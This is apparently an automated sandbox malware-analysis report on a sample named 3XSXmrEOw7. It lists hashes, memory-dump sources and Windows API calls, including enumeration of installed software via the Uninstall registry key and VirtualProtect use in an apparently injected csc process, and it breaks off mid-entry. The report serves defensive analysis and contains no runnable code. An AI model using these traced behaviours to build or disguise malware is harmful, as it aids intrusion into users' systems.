                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: %c:\$common_filelist.txt
                                                                                                                        • API String ID: 1611563598-3546436211
                                                                                                                        • Opcode ID: e75b4604f8b7d37f5be918e54a961c424057a386e1b3c4596995fb37daa8ae50
                                                                                                                        • Instruction ID: 6025519ab524a28bed39fbe42f5c2c1978188ea60c5d789c7bac0d9d67ab69ce
                                                                                                                        • Opcode Fuzzy Hash: e75b4604f8b7d37f5be918e54a961c424057a386e1b3c4596995fb37daa8ae50
                                                                                                                        • Instruction Fuzzy Hash: A6412BB15043446AD320EBA09C41FEB77989F85705F44481FFB44562C2FBBCE645CB6A
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __getbuf
                                                                                                                        • String ID: hE$@hE
                                                                                                                        • API String ID: 554500569-3527237109
                                                                                                                        • Opcode ID: 2d09c157eed4a3bd63498b0e5f70137e9fd5757940b0b5303955637cf367db83
                                                                                                                        • Instruction ID: f17e0a6b82f98ebd52715b5456d606124dd6aad15095f93feb889772c3e2a4ef
                                                                                                                        • Opcode Fuzzy Hash: 2d09c157eed4a3bd63498b0e5f70137e9fd5757940b0b5303955637cf367db83
                                                                                                                        • Instruction Fuzzy Hash: 3731A271600710AFC7308F19D841B6677A4EF51329F54C92FE8AA8B291D73CE984CB88
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,0040F91B,00000001,?), ref: 0040F763
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 0040F818
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 626452242-3916222277
                                                                                                                        • Opcode ID: 84796c686fa8f72b5e6dfbd94a193fb8d16dbb584841e412bd2790552e76208a
                                                                                                                        • Instruction ID: df888b1d167fcae8043a8df2e68d74cec1358aa0cf7ec91854029ad9e172171b
                                                                                                                        • Opcode Fuzzy Hash: 84796c686fa8f72b5e6dfbd94a193fb8d16dbb584841e412bd2790552e76208a
                                                                                                                        • Instruction Fuzzy Hash: C0216BB610435166E330A724DC42BEB72F4EBC4751F10853EF6D69A1D0E7785449C39B
                                                                                                                        APIs
                                                                                                                        • GetClassInfoA.USER32(?,-0000007C,?), ref: 004384AF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassInfo
                                                                                                                        • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                                        • API String ID: 3534257612-2801496823
                                                                                                                        • Opcode ID: dbe3cc86fff193af0684558f81ef42c515353e085cb2aed473aa4667f0f1f147
                                                                                                                        • Instruction ID: b8301b33258d6b108bdec7fe8fd4c628fef138bfb49540b2024fb64cfbea2f2c
                                                                                                                        • Opcode Fuzzy Hash: dbe3cc86fff193af0684558f81ef42c515353e085cb2aed473aa4667f0f1f147
                                                                                                                        • Instruction Fuzzy Hash: 2721307190020AAF9B10EFA5D8419DFBBB8EE59354F00402FF904E3201E7789951CBA9
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0040F5D8
                                                                                                                        • GetVolumeInformationA.KERNEL32 ref: 0040F608
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorInformationLastVolume
                                                                                                                        • String ID: CDFS
                                                                                                                        • API String ID: 2466915109-2335696158
                                                                                                                        • Opcode ID: 1ec4429c2c58c8115991c57e6d5b520f750cf642e641293ec524bb6b560938c4
                                                                                                                        • Instruction ID: 0ba698df5349420569fcb0b07cbe6f9900faa6667f1b351f96fad5a35dfb1ad2
                                                                                                                        • Opcode Fuzzy Hash: 1ec4429c2c58c8115991c57e6d5b520f750cf642e641293ec524bb6b560938c4
                                                                                                                        • Instruction Fuzzy Hash: EC1127766042016BE711CB58DC05BD7BBE4ABD5300F04C87DF58457181EAB4994DC763
                                                                                                                        APIs
                                                                                                                        • RegCloseKey.ADVAPI32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00418332,80000002,?,?,80000002,?,80000002,?), ref: 0041752A
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00418332,80000002,?,?,80000002,?,80000002,?), ref: 0041754B
                                                                                                                        Strings
                                                                                                                        • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00417520
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpen
                                                                                                                        • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                        • API String ID: 47109696-1023437679
                                                                                                                        • Opcode ID: 444a49b0fa5d6bc81e2978ef739fc310acf3f21d06593166a15287e9831d7ba9
                                                                                                                        • Instruction ID: 0f0fbff194b733e9befad18985cc3632bf2348863539eaefa16bfffbd4cac233
                                                                                                                        • Opcode Fuzzy Hash: 444a49b0fa5d6bc81e2978ef739fc310acf3f21d06593166a15287e9831d7ba9
                                                                                                                        • Instruction Fuzzy Hash: 78E0EC75504310AFD370DF58EC49F87BBE8EF4A750F01881EB889D3250D6749840CBA5
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0042C78D
                                                                                                                          • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                        • EnterCriticalSection.KERNEL32(00000020,004252A6,?,0044C9A0,0000000C,0041AB0C,00000000,?,?,00446A11,004044BD), ref: 0042C798
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterSection$__lock
                                                                                                                        • String ID: `jE
                                                                                                                        • API String ID: 3410214836-775037952
                                                                                                                        • Opcode ID: 020948bbfa1e214e93c434217dc0c5e047081603cf218c95e1a180738668f8e1
                                                                                                                        • Instruction ID: e25f03711a34877e1c848d10ee6b2a6bf970461377bf0363c61bc6c07be673b1
                                                                                                                        • Opcode Fuzzy Hash: 020948bbfa1e214e93c434217dc0c5e047081603cf218c95e1a180738668f8e1
                                                                                                                        • Instruction Fuzzy Hash: 9BD022B6B0010203DF282676EEC950E3208D2823037EA8C3BF802C3282CF2CDD80840D
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00480774,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 00443862
                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 00443874
                                                                                                                        • LeaveCriticalSection.KERNEL32(00480774,?,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82), ref: 0044387D
                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82,0043538D), ref: 0044388F
                                                                                                                          • Part of subcall function 004437CB: InitializeCriticalSection.KERNEL32(00480774,00443842,00443333,00000010,?,?,?,?,?,00442F7C,00442F2F,00441F83,00442F82,0043538D,?,0047EA90), ref: 004437E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 713024617-0
                                                                                                                        • Opcode ID: d2f9604f23d93bf9d1f3fcdad8a379a939db2a14611848bcd9185e1ad81e3a83
                                                                                                                        • Instruction ID: 3b45dfc569fa32815649505fb739a58a282b546805a0b9d948b316ba2df3f3b5
                                                                                                                        • Opcode Fuzzy Hash: d2f9604f23d93bf9d1f3fcdad8a379a939db2a14611848bcd9185e1ad81e3a83
                                                                                                                        • Instruction Fuzzy Hash: 82F06D7101020ADFE750AF94EC84A5AF3ACFB15716F00083BE14083011D738F658CBA8

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:10.3%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:17
                                                                                                                        Total number of Limit Nodes:2
                                                                                                                        execution_graph 33691 4f2ec40 33693 4f2ec53 33691->33693 33695 4f2ecf8 33693->33695 33696 4f2ed40 VirtualProtect 33695->33696 33698 4f2ecdb 33696->33698 33676 94c8308 33677 94c831d 33676->33677 33679 94c86da 33677->33679 33681 94c8669 33679->33681 33680 94c87d4 33680->33677 33681->33679 33681->33680 33683 9481c88 33681->33683 33686 9481c93 33683->33686 33684 9481e94 33684->33681 33685 9481d20 KiUserExceptionDispatcher 33685->33686 33686->33684 33686->33685 33687 4f2eea8 33688 4f2eee8 CloseHandle 33687->33688 33690 4f2ef19 33688->33690
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4$T''
                                                                                                                        • API String ID: 0-3223105421
                                                                                                                        • Opcode ID: 09406dee279972af35935da269b7ad2e0056671dfbf5b49483bf5b3d855b32c0
                                                                                                                        • Instruction ID: e4ce1ddbb629d6242c0062b6986eedb33426eb96ead2db91d9ecddd4a89f6379
                                                                                                                        • Opcode Fuzzy Hash: 09406dee279972af35935da269b7ad2e0056671dfbf5b49483bf5b3d855b32c0
                                                                                                                        • Instruction Fuzzy Hash: 9AB20734A01218DFDB14CFA5C994BADB7B6BF48310F158199EA05EB3A6DB70AC85CF50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4$T''
                                                                                                                        • API String ID: 0-3223105421
                                                                                                                        • Opcode ID: 4caf02b135f1a240821ea95d3c0b7f7fc4452911f483cbf0661e2ab7f72596a6
